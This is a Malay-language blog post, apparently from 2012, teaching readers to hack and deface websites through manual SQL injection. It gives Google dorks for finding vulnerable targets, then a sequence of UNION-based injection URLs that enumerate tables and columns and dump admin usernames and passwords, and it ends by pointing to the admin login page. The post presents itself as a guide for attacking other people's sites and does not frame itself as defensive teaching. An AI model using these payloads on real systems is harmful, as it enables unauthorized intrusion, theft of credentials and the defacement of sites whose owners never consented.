Deface Dengan Manual Sql Injection

0 Komen Budak Comeii
Assalamualaikum , harini aku nak kongsi sikit cara hack website dengan mengguna cara manual sql injection :) entry sebelum ni menggunakan Havij ( Automaton ) http://www.doyshinja.com/2012/11/sql-injection-deface.html Kata kunci yang perlu diketahui ------------------------------- karakter : ', - comments : /*, -- ------------------------------- Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x ke atas Google Dork yang akan di gunakan ialah --> "inurl:news.php?id=" "inurl:index.php?id=" "inurl:trainers.php?id=" "inurl:buy.php?category=" "news-article.php?id=" "inurl:article.php?ID=" -------------------------Langkah Pertama------------------------- www.target.com/news.php?id=1 ---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk sql injection atau pun tidak. contoh inject code :- www.target.com/news.php?id=1' atau www.target.com/news.php?id=-1 Contoh pesan error :- warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line -------------------------Langkah Kedua------------------------- Cari jumlah table yang ada di dalam database. tambahkan : +order+by+1-- diakhir url Contoh: Code: www.target.com/news.php?id=1+order+by+1-- atau www.target.com/news.php?id=1+order+by+1/* periksa secara bepringkat www.target.com/news.php?id=1+order+by+2/* www.target.com/news.php?id=1+order+by+3/*cari sehingga error keluar Untuk tutorial ini jumlah table yg diperolehi ialah 3. -------------------------Langkah Ketiga------------------------- Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian. perintah yang akan digunakan : +union+select+1,2,3-- diakhir url Contoh www.target.com/news.php?id=1+union+select+1,2,3-- Contoh: angka 2 keluar. kemudian kita masukkan version() di angka (2), contoh: www.target.com/news.php?id=1+union+select+1,version(),3-- dan paparan version akan tepapar di angka tersebut. Contoh: 5.1.47-community-log ------ |info| ------ version() = untuk lihat version msql yang digunakan database() = untuk lihat name database yang digunakan -------------------------Langkah Keempat------------------------- untuk nampakkan nama2 table yang ada di web tersebut, perintah table_name letak di angka yang keluar tadi --> (2) +from+information_schema.tables-- ---> letak di belakang angka yang terakhir. contoh: www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables-- atau kita tambah perintah karekter - di depan angka pertama www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables-- -------------------------Langkah Kelima------------------------- Keluarkan kesemua isi yang ada di dalam table tersebut, group_concat(table_name) ---> letak di angka yang keluar tadi (2) +from+information_schema.tables+where+table_schema=database()-- ---> Masukan selepas angka yang terakhir. Contoh: www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+ information_schema.tables+where+table_schema=database()-- -------------------------Langkah Enam------------------------- Keluar kan kandungan yang ada didalam TABLE group_concat(column_name) ---> letak di angka yang keluar tadi(2) +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- (LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL) ------ |info| ------ Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah -----> www.piclist.com/techref/ascii.htm -----> www.centricle.com/tools/ascii-hex/ Column yang akan kita gunakan sebagai contoh ialah table ADMIN dan hasil convert ialah 41444D494E Contoh: www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x41444D494E-- -------------------------Langkah Ketujuh------------------------- Keluarkan hasil isi yang kita berjaya peroleh dari table Admin concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2) +from+Admin-- --> asal column Contoh: www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin-- Dan kita akan peroleh username dan password admin untuk website tersebut. -------------------------Langkah Terakhir------------------------- Cari Login untuk Admin Pages.
- SUMBER - Anda sedang membaca artikel tentang Deface Dengan Manual Sql Injection dan anda bisa menemukan artikel Deface Dengan Manual Sql Injection ini dengan url http://www.doyshinja.com/2012/11/deface-dengan-manual-sql-injection.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Deface Dengan Manual Sql Injection ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Deface Dengan Manual Sql Injection sumbernya.

Leave a Reply